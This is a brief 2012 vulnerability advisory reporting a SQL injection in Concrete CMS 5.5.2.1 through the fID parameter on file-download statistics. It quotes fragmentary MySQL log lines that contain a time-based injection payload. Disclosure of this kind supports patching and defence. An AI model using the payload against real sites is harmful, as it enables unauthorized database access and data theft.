Concrete CMS version 5.5.2.1 suffers from a remote SQL injection vulnerability.
ec3c52d761ec4846d8b90d54a23eb71cb3fe4e2ec28114fb9822fa574d73764a
[ TITLE ....... ][ Concrete 5.5.2.1 CMS - SQL Injection
[ DATE ........ ][ 22.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
SQL Injection.
[--------------------------------------------[
[ 3. Where is bug :)
Vulnerable parameter is fID. For example (from mysqls logs):
60832 Query insert into DownloadStatistics (fID, fvID, uID, rcID) values (NULL, 0, 1, 0)
FROM Files LEFT JOIN FileVersions on Files.fID = FileVersions.fID and FileVersions.fvIsApproved = 1
WHERE Files.fID = '1 waitfor delay \'0:0:10\'--'
FROM Files LEFT JOIN FileVersions on Files.fID = FileVersio
Ok, so now we know that sql injection occurs in parameter for 'statistic' (if file=downloaded >+1@stats).
Enjoy.
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[